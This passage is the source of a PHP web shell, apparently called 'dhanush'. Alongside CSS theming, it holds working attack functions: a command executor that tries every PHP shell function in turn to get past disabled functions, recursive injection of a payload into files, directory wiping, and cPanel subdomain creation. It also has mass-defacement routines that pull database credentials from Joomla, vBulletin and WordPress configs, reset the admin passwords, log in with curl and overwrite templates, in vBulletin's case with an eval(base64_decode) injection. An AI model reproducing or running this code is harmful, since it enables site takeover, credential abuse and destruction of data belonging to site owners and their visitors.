907 -moz-border-radius:4px;
908 box-shadow: 0px 0px 2px #000;
909}
910td.myfun:hover
911{
912 box-shadow: 0px 0px 2px #FF0;
913}
914input.but {
915 border: 1px solid #787878;
916 border-radius: 5px;
917 box-shadow: 0px 0px 2px #000 inset;
918}
919a:link,a:visited {
920 color: #000000;
921 text-decoration:none;
922 font-weight:500;
923}
924a:hover {
925 color:#666666;
926 text-decoration:underline;
927}
928font.mainmenu
929{
930 display: inline;
931 padding: 1px;
932 border: 1px solid #AAA;
933 border-radius: 4px;
934 box-shadow: 0px 0px 2px #000;
935 text-decoration: none;
936 font-weight: bold;
937 color: #696969;
938}
939font.txt
940{
941 color: #000000;
942 text-decoration:none;
943 font-size:13px;
944}
945font.om
946{
947 color:#000000;
948}
949font.fun
950{
951 color: #696969;
952}
953font.wrtperm
954{
955 color:#000000;
956}
957font.readperm
958{
959 color:#000000;
960}
961font.noperm
962{
963 color:#000000;
964}
965input.upld
966{
967 border: 1px solid #787878;
968 box-shadow: 0px 0px 3px #000 inset;
969 background-color: #AAA;
970 font-family: Courier;
971 -moz-border-radius:6px;
972 width:400;
973 border-radius:6px;
974}
975input.box
976{
977 border: 1px solid #787878;
978 box-shadow: 0px 0px 3px #000 inset;
979 background-color: #AAA;
980 font-family: Courier;
981 -moz-border-radius:6px;
982 width:400;
983 border-radius:6px;
984}
985input.sbox
986{
987 border: 1px solid #787878;
988 box-shadow: 0px 0px 3px #000 inset;
989 background-color: #AAA;
990 font-family: Courier;
991 -moz-border-radius:6px;
992 width:180;
993 border-radius:6px;
994}
995select.sbox
996{
997 border: 1px solid #787878;
998 box-shadow: 0px 0px 3px #000 inset;
999 background-color: #AAA;
1000 font-family: Courier;
1001 -moz-border-radius:6px;
1002 width:180;
1003 border-radius:6px;
1004}
1005select.box
1006{
1007 border: 1px solid #787878;
1008 box-shadow: 0px 0px 3px #000 inset;
1009 background-color: #AAA;
1010 font-family: Courier;
1011 -moz-border-radius:6px;
1012 width:400;
1013 border-radius:6px;
1014}
1015
1016textarea.box
1017{
1018 border: 1px solid #787878;
1019 margin-top: 10px;
1020 -moz-border-radius:7px;
1021 box-shadow: 0px 0px 3px #000 inset;
1022 background-color: #AAA;
1023}
1024textarea:focus
1025{
1026 box-shadow: 0px 0px 3px #FF0 inset;
1027}
1028body {
1029 background-color:#C0C0C0;
1030}
1031.myphp table
1032{
1033 width:100%;
1034 padding:18px 10px;
1035 border : 1px solid #1B1B1B;
1036}
1037.myphp td
1038{
1039 /*background:#111111; */
1040 color:#000000;
1041 padding:6px 8px;
1042 border-bottom:1px solid #222222;
1043 font-size:14px;
1044}
1045.myphp th, th
1046{
1047 background:#999999;
1048
1049}
1050-->
1051</style>";
1052
1053 if($_COOKIE['style']=='dhanush')
1054 $shellstyle = $hs_dhanush;
1055 elseif($_COOKIE['style']=='404')
1056 $shellstyle = $hs_404;
1057 elseif($_COOKIE['style']=='orange')
1058 $shellstyle = $hs_orange;
1059 elseif($_COOKIE['style']=='phizo')
1060 $shellstyle = $hs_phizo;
1061 else
1062 {
1063 if($my_shell_style == "phizo")
1064 $shellstyle = $hs_phizo;
1065 elseif($my_shell_style=='dhanush')
1066 $shellstyle = $hs_dhanush;
1067 elseif($my_shell_style=='404')
1068 $shellstyle = $hs_404;
1069 elseif($my_shell_style=='orange')
1070 $shellstyle = $hs_orange;
1071 }
1072if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
1073{
1074 $self=$_SERVER["PHP_SELF"];
1075 $os = "N/D";
1076 $bdmessage = null;
1077 $dir = getcwd();
1078
1079 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
1080 $path=explode('/',$url);
1081 $curr_url =str_replace($path[count($path)-1],'',$url);
1082
1083 if(strtolower(substr(PHP_OS,0,3)) == "win")
1084 {
1085 $SEPARATOR = '\\';
1086 $os = "Windows";
1087 $directorysperator="\\";
1088 }
1089 else
1090 {
1091 $os = "Linux";
1092 $directorysperator='/';
1093 }
1094 function Trail($d,$directsperator)
1095 {
1096 $d=explode($directsperator,$d);
1097 array_pop($d);
1098 array_pop($d);
1099 $str=implode($d,$directsperator);
1100 return $str;
1101 }
1102
1103 function randomt()
1104 {
1105 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
1106 srand((double)microtime()*1000000);
1107 $i = 0;
1108 $pass = '' ;
1109
1110 while ($i <= 7)
1111 {
1112 $num = rand() % 33;
1113 $tmp = substr($chars, $num, 1);
1114 $pass = $pass . $tmp;
1115 $i++;
1116 }
1117 return $pass;
1118 }
1119 function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
1120 {
1121 $rootDomain = $_SERVER['SERVER_NAME'];
1122 $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;
1123
1124 $openSocket = fsockopen('localhost',2082);
1125 if(!$openSocket) {
1126 return "Socket error<BR>";
1127 }
1128
1129 $authString = $cPanelUser . ":" . $cPanelPass;
1130 $authPass = base64_encode($authString);
1131 $buildHeaders = "GET " . $buildRequest ."\r\n";
1132 $buildHeaders .= "HTTP/1.0\r\n";
1133 $buildHeaders .= "Host:localhost\r\n";
1134 $buildHeaders .= "Authorization: Basic " . $authPass . "\r\n";
1135 $buildHeaders .= "\r\n";
1136
1137 fputs($openSocket, $buildHeaders);
1138 while(!feof($openSocket)) {
1139 fgets($openSocket,128);
1140 }
1141 fclose($openSocket);
1142 // create index file
1143 @chdir($subDomain);
1144 $file5 = fopen("index.html","w");
1145 fputs($file5,$subindex);
1146 fclose($file5);
1147 $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";
1148
1149 return $newDomain;
1150}
1151
1152 // Database functions
1153 function listdatabase()
1154 {
1155 $self=$_SERVER["PHP_SELF"];
1156 ?>
1157 <br>
1158 <form>
1159 <table>
1160 <tr>
1161 <td><input type="text" class="box" name="dbname"></td>
1162 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
1163 </tr>
1164 </table>
1165 </form>
1166 <br>
1167 <?php
1168 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
1169 $result = mysql_query("SHOW DATABASE");
1170 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
1171
1172 $pDB = mysql_list_dbs( $mysqlHandle );
1173 $num = mysql_num_rows( $pDB );
1174 for( $i = 0; $i < $num; $i++ )
1175 {
1176 $dbname = mysql_dbname( $pDB, $i );
1177 mysql_select_db($dbname,$mysqlHandle);
1178 $result = mysql_query("SHOW TABLES");
1179 $num_of_tables = mysql_num_rows($result);
1180 echo "<tr>\n";
1181 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
1182 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
1183 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
1184 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
1185 echo "</tr>\n";
1186 }
1187 echo "</table>\n";
1188 mysql_close($mysqlHandle);
1189 }
1190
1191 function listtable()
1192 {
1193 $self=$_SERVER["PHP_SELF"];
1194 $dbserver = $_COOKIE["dbserver"];
1195 $dbuser = $_COOKIE["dbuser"];
1196 $dbpass = $_COOKIE["dbpass"];
1197 $dbname = $_GET['dbname'];
1198 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
1199 ?>
1200 <br><br>
1201 <form>
1202 <table>
1203
1204 <tr>
1205 <td><input type="text" class="box" name="tablename"></td>
1206 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
1207 </tr>
1208 </table>
1209
1210 <br>
1211 <form>
1212 <table>
1213 <tr>
1214 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
1215 </tr>
1216 <tr>
1217 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
1218 </tr>
1219 </table>
1220 </form>
1221
1222 <?php
1223
1224 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
1225
1226 mysql_select_db($dbname);
1227 $pTable = mysql_list_tables( $dbname );
1228
1229 if( $pTable == 0 ) {
1230 $msg = mysql_error();
1231 echo "<h3>Error : $msg</h3><p>\n";
1232 return;
1233 }
1234 $num = mysql_num_rows( $pTable );
1235
1236 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
1237
1238 for( $i = 0; $i < $num; $i++ )
1239 {
1240 $tablename = mysql_tablename( $pTable, $i );
1241 $result = mysql_query("select * from $tablename");
1242 $num_rows = mysql_num_rows($result);
1243 echo "<tr>\n";
1244 echo "<td>\n";
1245 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
1246 echo "</td>\n";
1247 echo "<td>\n";
1248 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
1249 echo "</td>\n";
1250 echo "<td>\n";
1251 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
1252 echo "</td>\n";
1253 echo "<td>\n";
1254 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
1255 echo "</td>\n";
1256 echo "<td>\n";
1257 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
1258 echo "</td>\n";
1259 echo "</tr>\n";
1260 }
1261
1262 echo "</table></form>";
1263 mysql_close($mysqlHandle);
1264 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
1265 }
1266
1267
1268 function paramexe($n, $v)
1269 {
1270 $v = trim($v);
1271 if($v)
1272 {
1273 echo '<span><font size=3>' . $n . ': </font></span>';
1274 if(strpos($v, "\n") === false)
1275 echo '<font size=2>' . $v . '</font><br>';
1276 else
1277 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1278 }
1279 }
1280 $mycount = 0;
1281 function injectdir($dir,$filetype,$mode,$lolinject)
1282 {
1283 global $curfile,$mycount;
1284 if (is_dir($dir))
1285 {
1286 $objects = scandir($dir);
1287 foreach ($objects as $object)
1288 {
1289 if ($object != '.' && $object != '..' && strpos($dir, 'dhanush') == false && strpos($dir, 'sym') == false)
1290 {
1291 if (is_dir($dir . '/' . $object))
1292 {
1293 // if we find a directory, do a recursive call
1294 injectdir($dir . '/' . $object,$filetype,$mode,$lolinject);
1295 }
1296 else
1297 {
1298 $file_parts = pathinfo($object);
1299 if($file_parts['extension'] == $filetype)
1300 {
1301 if(($dir . '/' . $object) == $curfile)
1302 continue;
1303 $fp=fopen($dir . '/' . $object,$mode);
1304 if (fputs($fp,$lolinject))
1305 {
1306 $mycount++;
1307 echo '<br><font class=txt >'.$dir . '/' . $object.' was injected<br></font>';
1308 }
1309 else
1310 echo '<font >failed to inject '.$dir . '/' . $object.'<BR></font>';
1311 }
1312 }
1313 }
1314 }
1315 }
1316 }
1317 function rrmdir($dir)
1318 {
1319 if (is_dir($dir)) // ensures that we actually have a directory
1320 {
1321 $objects = scandir($dir); // gets all files and folders inside
1322 foreach ($objects as $object)
1323 {
1324 if ($object != '.' && $object != '..')
1325 {
1326 if (is_dir($dir . '/' . $object))
1327 {
1328 // if we find a directory, do a recursive call
1329 rrmdir($dir . '/' . $object);
1330 }
1331 else
1332 {
1333 // if we find a file, simply delete it
1334 unlink($dir . '/' . $object);
1335 }
1336 }
1337 }
1338 // the original directory is now empty, so delete it
1339 rmdir($dir);
1340 }
1341 }
1342
1343 function which($pr)
1344 {
1345 $path = execmd("which $pr");
1346 if(!empty($path))
1347 return trim($path);
1348 else
1349 return trim($pr);
1350 }
1351
1352 function magicboom($text)
1353 {
1354 if (!get_magic_quotes_gpc())
1355 return $text;
1356 return stripslashes($text);
1357 }
1358 function perlshell($command)
1359 {
1360 $perl=new perl();
1361 ob_start();
1362 $perl->eval("system('".$command."')");
1363 $exec=ob_get_contents();
1364 ob_end_clean();
1365 return $exec;
1366}
1367function execmd($cmd,$d_functions="None")
1368{
1369 if($d_functions=="None")
1370 {
1371 $ret=passthru($cmd);
1372 return $ret;
1373 }
1374 $funcs=array("shell_exec","exec","passthru","system","popen","perl_func");
1375 $d_functions=str_replace(" ","",$d_functions);
1376 $dis_funcs=explode(",",$d_functions);
1377 foreach($funcs as $safe)
1378 {
1379 if(!in_array($safe,$dis_funcs))
1380 {
1381 if($safe=="exec")
1382 {
1383 $ret=@exec($cmd);
1384 $ret=join("\n",$ret);
1385 return $ret;
1386 }
1387 elseif($safe=="system")
1388 {
1389 $ret=@system($cmd);
1390 return $ret;
1391 }
1392 elseif($safe=="passthru")
1393 {
1394 $ret=@passthru($cmd);
1395 return $ret;
1396 }
1397 elseif($safe=="shell_exec")
1398 {
1399 $ret=@shell_exec($cmd);
1400 return $ret;
1401 }
1402 elseif($safe=="popen")
1403 {
1404 $ret=@popen("$cmd",'r');
1405 if(is_resource($ret))
1406 {
1407 while(@!feof($ret))
1408 $read.=@fgets($ret);
1409 @pclose($ret);
1410 return $read;
1411 }
1412 return -1;
1413 }
1414 elseif($safe="proc_open")
1415 {
1416 $cmdpipe=array(
1417 0=>array('pipe','r'),
1418 1=>array('pipe','w')
1419 );
1420 $resource=@proc_open($cmd,$cmdpipe,$pipes);
1421 if(@is_resource($resource))
1422 {
1423 while(@!feof($pipes[1]))
1424 $ret.=@fgets($pipes[1]);
1425 @fclose($pipes[1]);
1426 @proc_close($resource);
1427 return $ret;
1428 }
1429 return -1;
1430 }
1431 elseif($safe=="perl_func")
1432 {
1433 $ret=perlshell($command);
1434 return $ret;
1435 }
1436 }
1437 }
1438 return -1;
1439}
1440 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
1441 {
1442 $ar0=explode($marqueurDebutLien, $text);
1443 $ar1=explode($marqueurFinLien, $ar0[$i]);
1444 return trim($ar1[0]);
1445 }
1446 function changeindexjo($conf,$h,$site)
1447 {
1448 global $defcount;
1449 $dol = '$';
1450 $sitename = entre2v2($conf,$dol."sitename = '","';");
1451 $username = entre2v2($conf,$dol."user = '","';");
1452 $password = entre2v2($conf,$dol."password = '","';");
1453 $dbname = entre2v2($conf,$dol."db = '","';");
1454 $prefix = entre2v2($conf,$dol."dbprefix = '","';");
1455 $localhost = entre2v2($conf,$dol."host = '","';");
1456
1457 $co=randomt();
1458
1459 $link=mysql_connect($localhost,$username,$password) ;
1460 mysql_select_db($dbname,$link);
1461
1462 $tryChaningInfo = mysql_query("UPDATE ".$prefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
1463
1464 $req =mysql_query("SELECT * from `".$prefix."extensions` ");
1465
1466 if ( $req )
1467 {
1468 $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
1469 $data = mysql_fetch_array($req);
1470 $template_name=$data["template"];
1471
1472 $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
1473 $data = mysql_fetch_array($req);
1474 $template_id=$data["extension_id"];
1475
1476 $url2 = $site_url =$site."/administrator/index.php";
1477
1478 $ch = curl_init();
1479 curl_setopt($ch, CURLOPT_URL, $url2);
1480 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1481 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1482 curl_setopt($ch, CURLOPT_HEADER, 1);
1483 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1484 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1485 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1486
1487 $buffer = curl_exec($ch);
1488
1489 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1490 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1491
1492 $url2=$site_url."/index.php";
1493 $ch = curl_init();
1494 curl_setopt($ch, CURLOPT_URL, $url2);
1495 curl_setopt($ch, CURLOPT_POST, 1);
1496 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
1497 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1498 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1499 curl_setopt($ch, CURLOPT_HEADER, 0);
1500 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1501 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1502 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1503 $buffer = curl_exec($ch);
1504 echo "<tr align =center>";
1505 echo '<td>admin : 123456789</td>';
1506 $pos = strpos($buffer,"com_config");
1507 if($pos === false)
1508 echo("<td>[-] Login Error</td>");
1509 else
1510 echo("<td><font class=txt>[+] Login Success</font></td>");
1511
1512 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1513 $ch = curl_init();
1514 curl_setopt($ch, CURLOPT_URL, $url2);
1515 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1516 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1517 curl_setopt($ch, CURLOPT_HEADER, 0);
1518 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1519 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1520 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1521 $buffer = curl_exec($ch);
1522
1523 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1524
1525 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1526
1527 $ch = curl_init();
1528 curl_setopt($ch, CURLOPT_URL, $url2);
1529 curl_setopt($ch, CURLOPT_POST, 1);
1530 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1531
1532 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1533 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1534 curl_setopt($ch, CURLOPT_HEADER, 0);
1535 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1536 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1537 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1538 $buffer = curl_exec($ch);
1539
1540 $pos = strpos($buffer,'<dd class="message message">');
1541 if($pos === false)
1542 {
1543 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Defaced</td>");
1544 }
1545 else
1546 {
1547 $defcount++;
1548 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1549 }
1550 }
1551 else
1552 {
1553 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
1554 $data = mysql_fetch_array($req);
1555 $template_name=$data["template"];
1556
1557 $url2=$site_url."/index.php";
1558 $ch = curl_init();
1559 curl_setopt($ch, CURLOPT_URL, $url2);
1560 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1561 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1562 curl_setopt($ch, CURLOPT_HEADER, 1);
1563 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1564 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1565 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1566 $buffer = curl_exec($ch);
1567
1568 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1569
1570 $url2=$site_url."/index.php";
1571 $ch = curl_init();
1572 curl_setopt($ch, CURLOPT_URL, $url2);
1573 curl_setopt($ch, CURLOPT_POST, 1);
1574 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
1575 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1576 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1577 curl_setopt($ch, CURLOPT_HEADER, 0);
1578 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1579 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1580 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1581 $buffer = curl_exec($ch);
1582
1583 $pos = strpos($buffer,"com_config");
1584 echo "<tr align =center>";
1585 echo '<td>admin : 123456789</td>';
1586 if($pos === false)
1587 echo("<td>[-] Login Error</td>");
1588 else
1589 echo("<td><font class=txt>[+] Login Success</font></td>");
1590
1591 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1592 $ch = curl_init();
1593 curl_setopt($ch, CURLOPT_URL, $url2);
1594 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1595 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1596 curl_setopt($ch, CURLOPT_HEADER, 0);
1597 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1598 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1599 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1600 $buffer = curl_exec($ch);
1601
1602 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1603
1604 $url2=$site_url."/index.php?option=com_templates&layout=edit";
1605 $ch = curl_init();
1606 curl_setopt($ch, CURLOPT_URL, $url2);
1607 curl_setopt($ch, CURLOPT_POST, 1);
1608 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1609 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1610 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1611 curl_setopt($ch, CURLOPT_HEADER, 0);
1612 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1613 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1614 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1615 $buffer = curl_exec($ch);
1616
1617 $pos = strpos($buffer,'<dd class="message message fade">');
1618 if($pos === false)
1619 {
1620 echo("<td><a href=http://".$site . ">".$site."</a></td><td>Cannot Deface</td>");
1621 }
1622 else
1623 {
1624 $defcount++;
1625 echo("<td><a href=http://".$site . ">".$site."</a></td><td><font class=txt>Joomla Defaced</font></td>");
1626 }
1627 }
1628 echo "</tr>";
1629 }
1630 function changeindexvb($conf,$index)
1631 {
1632 $dol = '$';
1633
1634 $username = entre2v2($conf,"['MasterServer']['username'] = '","';");
1635 $password = entre2v2($conf,"['MasterServer']['password'] = '","';");
1636 $dbname = entre2v2($conf,"se']['dbname'] = '","';");
1637 $prefix = entre2v2($conf,"['Database']['tableprefix'] = '","';");
1638 $localhost = entre2v2($conf,"['MasterServer']['servername'] = '","';");
1639
1640 $con =@ mysql_connect($localhost,$username,$password);
1641 $db =@ mysql_select_db($dbname,$con);
1642 $ss = mysql_query("SELECT * from `".$prefix."setting` WHERE varname='bburl'");
1643 $data = mysql_fetch_array($ss);
1644
1645 echo "<tr align=center>";
1646 $index=str_replace('"','\\"',$index);
1647 $attack = "{\${eval(base64_decode(\'";
1648 $attack .= base64_encode("echo \"$index\";");
1649 $attack .= "\'))}}{\${exit()}}</textarea>";
1650 $query = "UPDATE ".$prefix."template SET template = '$attack'";
1651 $result =@ mysql_query($query,$con);
1652 if($result)
1653 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><font class=txt><blink>Vbulletin Forum Defaced Successfully</blink></font></td>";
1654 else
1655 echo "<td><a href=".$data["value"].">".$data["value"]."</a></td><td><blink>Cannot Deface Vbulletin Forum</blink></td>";
1656 echo "<tr>";
1657 }
1658 function changeindexwp($conf,$index)
1659 {
1660 $index = urlencode($index);
1661 $dol = '$';
1662 $username = entre2v2($conf,"define('DB_USER', '","');");
1663 $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
1664 $dbname = entre2v2($conf,"define('DB_NAME', '","');");
1665 $prefix = entre2v2($conf,$dol."table_prefix = '","'");
1666 $host = entre2v2($conf,"define('DB_HOST', '","');");
1667 $con =@ mysql_connect($host,$username,$password);
1668 $db =@ mysql_select_db($dbname,$con);
1669 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
1670
1671 if($req1)
1672 {
1673 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1674 $data = mysql_fetch_array($req);
1675 $site_url=$data["option_value"];
1676
1677 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
1678 $data = mysql_fetch_array($req);
1679 $template = $data["option_value"];
1680
1681 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
1682 $data = mysql_fetch_array($req);
1683 $current_theme = $data["option_value"];
1684
1685 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1686 $url2=$site_url."/wp-login.php";
1687
1688 $ch = curl_init();
1689 curl_setopt($ch, CURLOPT_URL, $url2);
1690 curl_setopt($ch, CURLOPT_POST, 1);
1691 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
1692 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1693 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1694 curl_setopt($ch, CURLOPT_HEADER, 0);
1695 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1696 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1697 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1698 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1699 $buffer = curl_exec($ch);
1700
1701 $pos = strpos($buffer,"action=logout");
1702
1703 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
1704 curl_setopt($ch, CURLOPT_URL, $url2);
1705 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1706 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1707 curl_setopt($ch, CURLOPT_HEADER, 0);
1708 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1709 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1710 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1711 $buffer0 = curl_exec($ch);
1712
1713 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1714 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1715
1716 if(substr_count($_file,"index.php") != 0)
1717 $output .= "<tr align =center>";
1718 $url2=$site_url."/wp-admin/theme-editor.php";
1719 curl_setopt($ch, CURLOPT_URL, $url2);
1720 curl_setopt($ch, CURLOPT_POST, 1);
1721 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
1722 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1723 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1724 curl_setopt($ch, CURLOPT_HEADER, 0);
1725 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1726 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1727 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1728 $buffer = curl_exec($ch);
1729 curl_close($ch);
1730 $pos = strpos($buffer,'<div id="message" class="updated">');
1731 $cond = 0;
1732 if($pos === false)
1733 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td>Cannot Deface</td>";
1734 else
1735 $output .= "<td><a href=".$site_url.">Site : ".$site_url."</a></td><td><font class=txt>Wordpress Defaced Successfully</font></td>";
1736 }
1737 else
1738 $output.= "<td colspan=2> DB Error</td>";
1739 echo $output."</tr>";
1740 global $base_path;
1741 unlink($base_path.'COOKIE.txt');
1742 }
1743 function getDisabledFunctions()
1744 {
1745 if(!ini_get('disable_functions'))
1746 {
1747 return "None";
1748 }
1749 else
1750 {
1751 return @ini_get('disable_functions');
1752 }
1753 }
1754 function getFilePermissions($file)
1755 {
1756 $perms = fileperms($file);
1757
1758 if (($perms & 0xC000) == 0xC000) {
1759 // Socket
1760 $info = 's';
1761 } elseif (($perms & 0xA000) == 0xA000) {
1762 // Symbolic Link
1763 $info = 'l';
1764 } elseif (($perms & 0x8000) == 0x8000) {
1765 // Regular
1766 $info = '-';
1767 } elseif (($perms & 0x6000) == 0x6000) {
1768 // Block special
1769 $info = 'b';
1770 } elseif (($perms & 0x4000) == 0x4000) {
1771 // Directory
1772 $info = 'd';
1773 } elseif (($perms & 0x2000) == 0x2000) {
1774 // Character special
1775 $info = 'c';
1776 } elseif (($perms & 0x1000) == 0x1000) {
1777 // FIFO pipe
1778 $info = 'p';
1779 } else {
1780 // Unknown
